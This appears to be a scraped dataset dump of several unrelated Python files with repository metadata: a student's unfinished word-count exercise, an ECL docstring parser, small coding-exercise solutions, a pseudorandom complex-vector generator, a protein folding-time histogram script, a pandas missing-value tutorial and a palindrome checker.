5cdc3d8fc2d6064c8aed7bcf1fc396041a3ef2a1 | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /StudentProblem/10.21.11.2/1/1569578564.py | a178fed62c1e5d05670590176c94822f3406337d | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | import functools
import typing
import string
import random
import pytest
## Lösung Teil 1.
def nwords(s: str) -> n:
""" Funktion berechnet zu einem String Argument s die Anzahl der Worte im String.
args: string
returns: n
"""
n = 0
for i in (len(str)): #looping "abc abc"
if s[i] is string.whitespace:
n+=1 #code fehlerhaft, bei mehreren whitespaces
return n
## Lösung Teil 2.
def word_count_iter(it: iter) -> tuple:
""" Funktion nimmt iterierbares Argument , das bei jeder Iteration eine Zeile (einen String) liefert
Funktion liefert als Ergebnis ein Tupel aus der Anzahl der Zeilen, der Anzahl der Worte und der Anzahl der Zeichen,
die aus dem Argument gelesen worden sind.
Args: it iterierbares Objekt
Returns: t ein Tupel
"""
t=(,,)
pass
######################################################################
## Lösung Teil 3. (Tests)
def test_word_counter_iter():
assert word_count_iter("abc abc") == (,,)
assert word_count_iter("") == (,,)
assert word_count_iter("abc abc") == (,,)
## revert
try:
word_count_iter = word_count_iter.__wrapped__
except:
pass
## Lösung Teil 4.
def word_count(f: file) -> tuple:
"""
Funktion word_count nimmt einen Dateinamen f als Argument und liefert als Ergebnis ein Tupel aus der Anzahl der Zeilen,
der Anzahl der Worte und der Anzahl der Zeichen , die aus der zugehörigen Datei gelesen worden sind.
Args: f einen Dateinamen
Returns: tuple
"""
pass
######################################################################
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
3f038c912cdab138dfec0d40cf9f50af36ae68e9 | e98f3960d0465c91ec1e39272a49ce5ce4496708 | /src/ecldoc/parseDoc.py | b422e00207890399779faefac982fe2ebc84ceb4 | [] | no_license | successar/ecldoc | 7336c26291e68663e4bc739ab891f521724245cf | c7c7458c1bafb2bf9563a082fc05da5f64ef0a2e | refs/heads/master | 2021-01-14T08:22:04.824906 | 2017-08-12T12:02:19 | 2017-08-12T12:02:19 | 81,946,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,712 | py | import re
from lxml import etree
import lxml.html as H
from collections import defaultdict
def parseDocstring(docstring) :
'''
Parse Docstring as returned by eclcc,
break into individual tags and
return them as XML Elements
'''
docstring = re.sub(r'\n\s*\*', '\n', docstring)
docstring = re.sub(r'\r', ' ', docstring)
docstring = docstring.strip().split('\n')
docdict = defaultdict(list)
current_tag = 'content'
current_text = ''
for line in docstring :
is_tag = re.search(r'^\s*@', line)
if is_tag :
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
line = re.split(r'\s', line.lstrip(), maxsplit=1)
tag = line[0][1:]
text = line[1]
current_tag = tag
current_text = text + '\n'
else :
current_text += line + '\n'
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
for tag in docdict :
for i, desc in enumerate(docdict[tag]) :
root = H.fragment_fromstring(desc, create_parent='div')
removeWS(root)
content = etree.Element(tag)
content.text = etree.tostring(root)
content.text = re.sub(r'^<div>', '', content.text)
content.text = re.sub(r'</div>$', '', content.text)
docdict[tag][i] = content
return docdict
def removeWS(element) :
'''
Format Whitespace in HTML elements in docstring
coming from parsed XML Output of ECL File
'''
if element.tag == 'pre' :
lines = element.text.split('\n')
element.text = lines[0]
for line in lines[1:] :
br = etree.Element('br')
br.tail = line
element.append(br)
return
if element.text is not None :
element.text = re.sub(r'\s+', ' ', element.text)
for e in element.iterchildren() :
if e.tail :
e.tail = re.sub(r'\s+', ' ', e.tail)
removeWS(e)
def findFirstLine(current_text) :
'''
Find First line in docstring content section to be used as caption
in TOC and Tree
'''
split_1 = re.split(r'\.\s|\.$', current_text.strip(), maxsplit=1)
if len(split_1) == 2 :
return split_1[0].strip()
split_2 = re.split(r'\n', current_text.strip(), maxsplit=1)
return split_2[0].strip()
##########################################################
def construct_type(ele) :
'''
Parse Type Tree into single string representation
'''
if ele is None : return ''
if type(ele) == list : return ''
typestring = ''
attribs = ele.attrib
typename = attribs['type']
if typename == 'record' :
if 'unnamed' in attribs :
typestring += '{ '
fields = []
for field in ele.findall('Field') :
fields.append(construct_type(field.find('./Type')) + " " + field.attrib['name'])
typestring += ' , '.join(fields) + ' }'
else :
typestring += attribs['origfn'] if 'origfn' in attribs else attribs['name']
else :
typestring += typename.upper()
if 'origfn' in attribs :
typestring += ' ( ' + attribs['origfn'] + ' )'
elif 'name' in attribs :
typestring += ' ( ' + attribs['name'] + ' )'
if typename == 'function' :
typestring += ' [ '
params = []
for p in ele.find('Params').findall('Type') :
params.append(construct_type(p))
typestring += ' , '.join(params) + ' ]'
if ele.find('./Type') is not None :
typestring += ' ( ' + construct_type(ele.find('./Type')) + ' )'
return typestring
##########################################################
def cleansign(text) :
'''
Remove irrelevant prefix and suffixes from signature
'''
text = re.sub(r'^export', '', text, flags=re.I)
text = re.sub(r'^shared', '', text, flags=re.I)
text = re.sub(r':=$', '', text, flags=re.I)
text = re.sub(r';$', '', text, flags=re.I)
text = re.sub(r'\s+', ' ', text.strip())
return text
def breaksign(name, text) :
'''
Heuristically break signature of ECL Definition
recovered from ecl file into "return name (Paramters)"
'''
name = name.lower()
string = ' ' + text.lower() + ' '
pos = 1
open_bracks = ['{', '(', '[']
close_bracks = ['}', ')', ']']
stack = []
ret, param = '', ''
indent_len = 0
name_len = len(name)
for i in range(1, len(string)) :
c = string[i]
if c in open_bracks :
stack.append(c)
elif c in close_bracks :
if stack[-1] == open_bracks[close_bracks.index(c)] :
stack = stack[:-1]
else :
if len(stack) == 0 :
m = re.match(r'[\s\)]' + name + r'([^0-9A-Za-z_])', string[pos-1:])
if m :
pos = pos - 1
ret = text[:pos]
param = text[pos + name_len:]
indent_len = pos + name_len
break
pos += 1
return ret.strip(), param.strip(), indent_len
##########################################################
def getTags(doc) :
'''
Convert XML Documentation (generated using parseDocstring)
back to JSON (ie Python Dictionary)
'''
tag_dict = defaultdict(list)
if doc is None : return tag_dict
for child in doc.getchildren() :
tag_dict[child.tag].append(child.text)
return tag_dict
| [
"successar@gmail.com"
] | successar@gmail.com |
de2e4a9bf1208d0184327f19cfd432928ffbfdde | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /dcFp6EuCm8J2HNKFG_21.py | 75a6a5b07dd4596969ad89d81d4ceb4d5cc5bf5a | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py |
def func(lst):
global res
res = 0
fun(lst)
return res
def fun(lst):
global res
if isinstance(lst,list):
res += len(lst)
for l in lst:
fun(l)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
0c9ef5dcdc3f510c6972175e849cf43b3caee43c | 651a296c8f45b5799781fd78a6b5329effe702a0 | /c8lib/c8vec_uniform_01.py | f77127fe01f76857c299aa377e44b3252af5e4c8 | [] | no_license | pdhhiep/Computation_using_Python | 095d14370fe1a01a192d7e44fcc81a52655f652b | 407ed29fddc267950e9860b8bbd1e038f0387c97 | refs/heads/master | 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,367 | py | #!/usr/bin/env python
def c8vec_uniform_01 ( n, seed ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01 returns a unit pseudorandom C8VEC.
#
# Discussion:
#
# The angles should be uniformly distributed between 0 and 2 * PI,
# the square roots of the radius uniformly distributed between 0 and 1.
#
# This results in a uniform distribution of values in the unit circle.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Paul Bratley, Bennett Fox, Linus Schrage,
# A Guide to Simulation,
# Second Edition,
# Springer, 1987,
# ISBN: 0387964673,
# LC: QA76.9.C65.B73.
#
# Bennett Fox,
# Algorithm 647:
# Implementation and Relative Efficiency of Quasirandom
# Sequence Generators,
# ACM Transactions on Mathematical Software,
# Volume 12, Number 4, December 1986, pages 362-376.
#
# Pierre L'Ecuyer,
# Random Number Generation,
# in Handbook of Simulation,
# edited by Jerry Banks,
# Wiley, 1998,
# ISBN: 0471134031,
# LC: T57.62.H37.
#
# Peter Lewis, Allen Goodman, James Miller,
# A Pseudo-Random Number Generator for the System/360,
# IBM Systems Journal,
# Volume 8, Number 2, 1969, pages 136-143.
#
# Parameters:
#
# Input, integer N, the number of values to compute.
#
# Input, integer SEED, a seed for the random number generator.
#
# Output, complex C(N), the pseudorandom complex vector.
#
# Output, integer SEED, a seed for the random number generator.
#
import numpy
from math import cos, floor, pi, sin, sqrt
from sys import exit
i4_huge = 2147483647
seed = floor ( seed )
if ( seed < 0 ):
seed = seed + i4_huge
if ( seed == 0 ):
print ''
print 'C8VEC_UNIFORM_01 - Fatal error!'
print ' Input SEED = 0!'
exit ( 'C8VEC_UNIFORM_01 - Fatal error!' )
c = numpy.zeros ( n, 'complex' )
for j in range ( 0, n ):
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
r = sqrt ( seed * 4.656612875E-10 )
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
theta = 2.0 * pi * seed * 4.656612875E-10
c[j] = r * complex ( cos ( theta ), sin ( theta ) )
return c, seed
def c8vec_uniform_01_test ( ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01_TEST tests C8VEC_UNIFORM_01.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
seed = 123456789
print ''
print 'C8VEC_UNIFORM_01_TEST'
print ' C8VEC_UNIFORM_01 computes pseudorandom complex values'
print ' in the unit circle.'
print ''
print ' The initial seed is %d' % ( seed )
print ''
n = 10
[ x, seed ] = c8vec_uniform_01 ( n, seed )
for i in range ( 0, n ):
print ' %6d ( %f, %f )' % ( i, x[i].real, x[i].imag )
print ''
print 'C8VEC_UNIFORM_01_TEST:'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
c8vec_uniform_01_test ( )
timestamp ( )
| [
"siplukabir@gmail.com"
] | siplukabir@gmail.com |
a4109108ce79ce8ffa413a457964c2fc31fa84dd | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /6NoaFGKJgRW6oXhLC_20.py | b805a8bd5efdd4230470dd426cbebc9d41b4ae6f | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py |
def sum_of_vowels(txt):
count = 0
txt = txt.upper()
for x in txt:
if x == "A":
count += 4
elif x == "E":
count += 3
elif x == "I":
count += 1
else:
count += 0
return count
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
c890c2a824190f02edfa382c7de2388243c80273 | d99e73252210d9ab5dea0b46d2f82f8a036373ce | /scripts/rawFoldTime.py | ee6e0616d95093414fa34bdc91064d3e9dc32732 | [] | no_license | schwancr/schwancr_bin | 710378ebca8482b1e4e38be894a22349e808e18a | fb42d40ac7be4b9984c257c09b569d740926781a | refs/heads/master | 2016-08-04T23:36:29.658194 | 2015-06-30T18:26:04 | 2015-06-30T18:26:04 | 7,841,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,813 | py | #!/usr/bin/env python
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-p',dest='proj_FN',default='../ProjectInfo.h5',help='ProjectInfo.h5 from msmbuilder [ ../ProjectInfo.h5 ]')
parser.add_option('-d',dest='data_FN',help='Data to use as a metric for folded and unfolded states' )
parser.add_option('--fc', dest='f_cut',type=float,help='Folded cutoff')
parser.add_option('--uc',dest='u_cut',type=float,help='Unfolded cutoff')
parser.add_option('--low-is-folded',dest='low_is_folded',default=False,action='store_true',help='Pass this flag if a small number means the conformation is folded (i.e. RMSD)')
parser.add_option('-o',dest='out_FN',default='Fold_Unfold_Times.pdf',help='Output file to write to')
options, args = parser.parse_args()
from numpy import *
from msmbuilder import Project
from pyschwancr import dataIO, msmTools
import os, sys, re
import matplotlib
matplotlib.use('pdf')
from matplotlib.pyplot import *
from scipy import optimize
Proj = Project.Project.LoadFromHDF( options.proj_FN )
Data = dataIO.readData( options.data_FN )
# first reshape the data into trajectories.
Lens = Proj['TrajLengths']
Trajs = []
sum = 0
for i in range( len( Lens ) ):
Trajs.append( Data[ sum : sum + Lens[i] ] )
sum += Lens[i]
Folds = []
Unfolds = []
for traj in Trajs:
(a,b) = msmTools.calcRawFoldTime( traj, options.f_cut, options.u_cut, low_is_folded = options.low_is_folded )
Folds.extend( a )
Unfolds.extend( b )
#FoldsDist = bincount( Folds )
#UnfoldsDist = bincount( Unfolds )
figure()
subplot(211)
foldHist = hist( Folds, bins=100, color = 'blue', label='Fold' )
vlines( mean( Folds ), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xFolds = xlim()
subplot(212)
unfoldHist = hist( Unfolds, bins=100, color = 'red', label='Unfold' )
vlines( mean( Unfolds), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xUnfolds = xlim()
xlabel('Fold/Unfold Times (frames)')
suptitle('Distribution of Folding/Unfolding times')
subplot(211)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Folds ), len( Folds ) ) )
yLimF = ylim()
subplot(212)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Unfolds ), len( Unfolds ) ) )
yLimU = ylim()
savefig( options.out_FN )
yFold = foldHist[0]
xFold = array( [ ( foldHist[1][i+1] + foldHist[1][i] ) / 2. for i in range( len( foldHist[0] ) ) ] )
yUnfold = unfoldHist[0]
xUnfold = array( [ ( unfoldHist[1][i+1] + unfoldHist[1][i] ) / 2. for i in range( len( unfoldHist[0] ) ) ] )
expFit = lambda p, x : p[0] * exp( - p[1] * x )
powFit = lambda p, x : p[0] * x ** ( - p[1] )
errExp = lambda p, x, y : expFit( p, x ) - y
errPow = lambda p, x, y : powFit( p, x ) - y
foldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xFold, yFold ), maxfev = 1000000 )
foldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xFold, yFold ), maxfev = 1000000 )
unfoldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
unfoldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
SStot_F = ( ( yFold - yFold.mean() ) **2 ).sum()
SStot_U = ( ( yUnfold - yUnfold.mean() ) ** 2 ).sum()
SSerr_F_exp = ( ( yFold - expFit( foldExp[0], xFold ) ) ** 2 ).sum()
SSerr_F_pow = ( ( yFold - powFit( foldPow[0], xFold ) ) ** 2 ).sum()
SSerr_U_exp = ( ( yUnfold - expFit( unfoldExp[0], xUnfold ) ) ** 2 ).sum()
SSerr_U_pow = ( ( yUnfold - powFit( unfoldPow[0], xUnfold ) ) ** 2 ).sum()
R2_F_exp = 1 - SSerr_F_exp / SStot_F
R2_F_pow = 1 - SSerr_F_pow / SStot_F
R2_U_exp = 1 - SSerr_U_exp / SStot_U
R2_U_pow = 1 - SSerr_U_pow / SStot_U
figure()
xi = linspace( 1, max(xFolds[1], xUnfolds[1]), 1000 )
subplot(211)
scatter( xFold, yFold, color = 'blue', label='Fold Times' )
plot( xi, expFit( foldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( foldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimF )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_F_exp, R2_F_pow ) )
legend()
subplot(212)
scatter( xUnfold, yUnfold, color = 'red', label = 'Unfold Times' )
plot( xi, expFit( unfoldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( unfoldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimU )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_U_exp, R2_U_pow ) )
legend()
suptitle('Fits of Distribution of Folding/Unfolding Times')
xlabel('Fold/Unfold Times (frames)')
savefig( options.out_FN[:-4] + 'FITS' + options.out_FN[-4:] )
| [
"schwancr@stanford.edu"
] | schwancr@stanford.edu |
eb08eed3392c1000edd7dfa16c3c1cbf171d51e6 | 0d8ee78f61660343e5feec41a53269dbf5585fa3 | /Demo11/fill_nan.py | 2705a3af2c26a7166ff0fe404b2b0e9ae7b01c2b | [] | no_license | x-jeff/Python_Code_Demo | 41b033f089fa19d8c63b2f26bf66ef379738c4ad | 9bc458b08cfae0092e8f11a54031ca2e7017affc | refs/heads/master | 2023-07-29T16:34:34.222620 | 2023-07-09T10:38:23 | 2023-07-09T10:38:23 | 176,306,727 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,954 | py | import pandas as pd
import numpy as np
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
#使用数值2填补缺失值
print(df.fillna(2))
#使用平均值填补缺失值
df["Age"].fillna(df["Age"].mean())
print(df)
df["Age"].fillna(df["Age"].mean(),inplace=True)
print(df)
np.random.seed(1)
df=pd.DataFrame({"key1":list('aabba'),"key2":["one","two","one","two","one"],"data1":np.random.randn(5),"data2":np.random.randn(5)})
print(df)
#求分层平均数
grouped=df["data1"].groupby(df["key1"])
print(grouped.mean())
# df["data1"]=df["data1"].groupby(df["key1"]).transform("mean")#方法一
df["data1"]=df.groupby("key1")["data1"].transform("mean")#方法二
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
#用各性别年龄平均值填补缺失值
#方式一
df["Age"].fillna(df["Age"].groupby(df["Gender"]).transform("mean"),inplace=True)
print(df)
#方式二
df["Age"].fillna(df.groupby("Gender")["Age"].transform("mean"),inplace=True)
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
#向后填补缺失值
# df.fillna(method="pad",inplace=True)
# print(df)
#向前填补缺失值
# df.fillna(method="bfill",inplace=True)
# print(df)
#在向前填补缺失值时,只填补一行
df.fillna(method="bfill",inplace=True,limit=1)
print(df)
df=pd.DataFrame([[1,870],[2,900],[np.nan,np.nan],[4,950],[5,1000],[6,1200]])
df.columns=["Time","Value"]
print(df)
#使用内插法填补缺失值
print(df.interpolate()) | [
"jeff.xinsc@gmail.com"
] | jeff.xinsc@gmail.com |
e9b3f8973d911ceb5d48ec19e663a81368493195 | f343b2ac4f5b52abd5e6a8fb6bef55acf3a32154 | /solutions-BEWARE-DO-NOT-ENTER/week-4/takeHomeChallenge-palindrome.py | e4a2ccdfe7f0be3a40c21436e6c20987ccb1f2fa | [] | no_license | asyrul21/recode-beginner-python | 41248d59199ac3660ef40aa3a5fdf23fadfb6b5b | 93608e2880aec1774e898d5f1a663dc84e246b46 | refs/heads/master | 2023-07-04T21:59:08.135443 | 2021-08-09T01:43:30 | 2021-08-09T01:43:30 | 330,307,505 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 944 | py | # The palindrome Checker
# 1. create a varible named word and assign it to the input() statement you learned last week
# 2. Transform this word to all lowercase by performing word.lower()
# 3. Set a flag named Palindrom and set it to True
# 4. Setup a for loop with enumeration, and check that the current letter must
# be equals to the letter at the same position from the bacl
# 5. If this is not true, you may change Palindrom to False, and break from the loop
# 6. Finally, if Palindrome is True, output something. Else, output a different message.
print("Welcome to the Palindrome Checker")
print()
word1 = input("Insert a word: ")
word1 = word1.lower()
palindrome = True
for idx, letter in enumerate(word1):
if word1[idx] == word1[len(word1) - (idx + 1)]:
palindrome = True
else:
palindrome = False
break
print()
if(palindrome):
print("This is a palindrome!")
else:
print("Nope this is not.")
| [
"asyrulhafetzy.21@gmail.com"
] | asyrulhafetzy.21@gmail.com |
13a7dfa407470abb9ca3c605120da264d916ae5d | 249c7081a766318360da21c66e7a30f917c90738 | /exercicio 2.py | c4a34ba0a76bc805393dd0d3128c0d2ff7cc3088 | [] | no_license | Danlei27/PycharmProjects | b4d93a966b45c84f206498faa60c36f8b356c5a9 | abedd9911d7a28f64366f4ea69de86ed16d39534 | refs/heads/master | 2020-05-30T10:32:55.793721 | 2019-06-01T00:33:27 | 2019-06-01T00:33:27 | 189,675,167 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | dia=input('dia')
mes=input('mes')
ano=input('ano')
cores = {'limpa':'\033[m',
'azul':'\033[34m',
'amarelo':'\033[33m',
'pretoebranco':'\033[7;30m'}
print('Você nasceu no dia' ,cores ['azul'],dia, 'do' ,mes, 'de' ,ano,cores['limpa'], '.correto?')
| [
"danleisantos@hotmail.com"
] | danleisantos@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.